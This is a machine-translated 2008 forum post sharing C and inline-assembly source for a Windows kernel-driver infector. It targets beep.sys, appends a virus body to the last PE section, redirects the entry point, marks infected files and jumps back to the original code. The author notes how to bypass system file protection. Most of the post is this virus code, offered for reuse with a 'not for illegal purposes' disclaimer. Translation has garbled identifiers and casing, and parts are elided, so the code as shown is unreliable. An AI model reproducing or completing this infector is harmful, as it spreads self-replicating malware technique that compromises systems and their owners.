Complete driver infection. Code. compiled through

[Original] complete driver infection. Code. compiled through

Question: [original] complete driver infection. Code. compiled through
Author: sudami
Time: 2008-05-28, 21: 59: 10
Chain: http://bbs.pediy.com/showthread.php? T = 65628

Complete driver infection. Code. compiled through

/*
* Module: infectdriver. c
*
* Author: Old y (originated from kanxue, but the code of old y is incomplete and needs to be supplemented by yourself)
* Fixer: sudami [sudami@163.com]
* Time: 08/05/28
*
* Comment:
*
* Half a year ago, Daniel went to kanxue to perform "drive infection" literacy. I didn't even understand it. I suddenly remembered it six months later, so
* I tried to learn about it. I got it for a few days and finally got debugging successful. The key point is that the computing-driven
* Size. After the driver is compiled, open it with IDA:
* 1. Calculate the offset from the first variable to call $ + 5.
* 2. Calculate the offset from ulendaddr to the end of the file. It is usually the short dd OF init.
*
* Description:
*
* The driver function is simple and can be expanded by itself. After infection is successful, only one thread is created to continuously print information.
* When you expand your own functions, you must always remember to relocate the global variables and functions.
* You can use the kgetglobalvaraddr () function to annotate the infected part in detail.
* For more information, see.
*****
*
* If you want to infect system files such as beep. sys and null. sys, remember to remove SFP first. Of course, active defense like micro-Points
* The software is no longer allowed to modify the sys in the driver directory. You need to find a solution;
*
* Zjjmj2002 has previously written a drive-infected sys, which is slightly distorted and will hook up ntopenfile for infection.
* The driver file accessed by the user is very evil ~~~~ --
*****
*
* Copyright (c) 2008 sudami.
* Freely distributable In source or binary for non‑cial purposes.
* This is not a virus, so take it easy, just for fun.
*
*/

I sent it out so that those who have not been in touch with this would take less detours, so that they would not have to complete the debugging just half a day ~~
Do not use it for illegal purposes. 

The two key parts are as follows:

/**
* @ Brief infect the specified file
*
* @ Param [in] Name of the driver to be infected by pwszfilename
* @ Param [in] difference between the ulnewentrypointdelta DriverEntry function address and the first address of the infected body
* @ Return returns STATUS_SUCCESS, indicating success. Other values indicate failure.
*/
Int kinfect (wchar * pwszfilename, ulong ulnewentrypointdelta)
{
_ ASM {
Call my_next
My_next:
Pop eax
Sub eax, 5
MoV uldelta, eax
}

Ultmp = uldelta-0x14b7;
Ulbodysize = ulendaddr-ultmp +0x34;

Nretcode = kpeinitfromfilew (
& PE,
Pwszfilename
);
If (! Nt_success (nretcode )){
Goto exit0;
}
If (PE. pdoshdr-> e_csum = 0x5748) {// infection mark
Goto exit0;
}
Ulsecnum = kpegetsecnum (& PE );
If (! Ulsecnum ){
Goto exit0;
}
//
// Align
// Misc. virtualsize-the section length in the file. That is, the section size before alignment
// Sizeofrawdata-the section length in memory, that is, the section size after Alignment
//
Ulfilealignment = PE. pnthdr-> optionalheader. filealignment; // The alignment of segments in the file
Ulsectionalignment = PE. pnthdr-> optionalheader. sectionalignment; // alignment of segments in the memory after loading.
PE. javaschdr [ulsecnum-1]. sizeofrawdata =
(PE. mongochdr [ulsecnum-1]. sizeofrawdata-1)/ulfilealignment + 1) * ulfilealignment;
PE. Duplicate chdr [ulsecnum-1]. Misc. virtualsize =
(PE. Duplicate chdr [ulsecnum-1]. Misc. virtualsize-1)/ulfilealignment + 1) * ulfilealignment;

//
// Pointertorawdata-the section is based on the file offset and can be used to locate the section in the file.
// Ulnewfilepos-new write point address, that is, at the end of the last section
// E_ip-initial command pointer value, relative offset value of e_cs-initial code segment
// Addressofentrypoint-program entry RVA
//
// The new program entry is changed to the last section of the infected body, where the DriverEntry in the virus
//
Ulnewfilepos = PE. mongochdr [ulsecnum-1]. sizeofrawdata + PE. mongochdr [ulsecnum-1]. pointertorawdata;
PE. pdoshdr-> e_ip = (ushort) (PE. pnthdr-> optionalheader. addressofentrypoint & 0 xFFFF );
PE. pdoshdr-> e_cs = (ushort) (PE. pnthdr-> optionalheader. addressofentrypoint> 16) & 0 xFFFF );
PE. pnthdr-> optionalheader. addressofentrypoint =
Ulnewentrypointdelta +
PE. mongochdr [ulsecnum-1]. virtualaddress +
PE. Duplicate chdr [ulsecnum-1]. Misc. virtualsize;
//
// Add the length of the last section, + ulbodysize, to the size of the infected body
//
PE. Duplicate chdr [ulsecnum-1]. sizeofrawdata + = ulbodysize;
PE. Duplicate chdr [ulsecnum-1]. Misc. virtualsize + = ulbodysize;
//
// Write the infection mark
// E_csum is the checksum.
//
PE. pdoshdr-> e_csum = 0x5748;
Nretcode = kseek (PE. hfile, ulnewfilepos );
If (! Nt_success (nretcode )){
Goto exit0;
}

Nretcode = kwritefile (
PE. hfile,
(Pvoid) ultmp, // The starting buffer address, which is the address of the first global variable of the virus.
Ulbodysize,
& Ulreturnlength
);
If (! Nt_success (nretcode )){
Goto exit0;
}

PE. pnthdr-> optionalheader. sizeofimage =
PE. Duplicate chdr [ulsecnum-1]. virtualaddress + PE. Duplicate chdr [ulsecnum-1]. Misc. virtualsize;

PE. Duplicate chdr [ulsecnum-1]. characteristics | = (image_scn_cnt_code | image_scn_mem_execute | image_scn_mem_write );
PE. mongochdr [ulsecnum-1]. Characteristics & = (~ Image_scn_mem_discardable );

//
//
//
Nretcode = kseek (PE. hfile, 0 );
If (! Nt_success (nretcode )){
Goto exit0;
}

..........
Exit0:
Kdelete (PE. mongochdr );
PE. Duplicate chdr = NULL;
Kdelete (PE. pnthdr );
PE. pnthdr = NULL;
Kdelete (PE. pdoshdr );
PE. pdoshdr = NULL;
Kclose (PE. hfile );
Return nresult;
}

//
// The driver will be infected with system32/Drivers/beep. SYS. The infection mode is to change the size of the last section,
// Then write the infected body code. The infected driver is loaded successfully and the dbuplint is used to output I'm here every second.
// You can view it in windbg or dbgview.
//
Ntstatus
DriverEntry (
In pdriver_object driverobject,
In punicode_string registrypath
)
{
....
Exit0:
_ ASM
{
Push offset g_ulorgentrypoint
Call kgetglobalvaraddr
MoV eax, [eax]
Or eax, eax
JZ exit1
Push eax // save eax-the original EOP
Call kcreatesystemthread // do what we want
Pop eax // restore eax-the original EOP
Pop EDI
Pop ESI
Pop EBX
MoV ESP, EBP
Pop EBP
JMP eax // the original entry of the JMP return program continues execution
}
Exit1:

_ ASM
{
MoV eax, 0c0000001h
Pop EDI
Pop ESI
Pop EBX
MoV ESP, EBP
Pop EBP
Retn 8
}
}

Views: 5547
File Size: 11.9 kb "src =" http://bbs.pediy.com/attachment.php? Attachmentid = 14468 & D = 1211983112 "border =" 0 "alt =" Name: snap1.gif
Views: 5547
File Size: 11.9 kb ">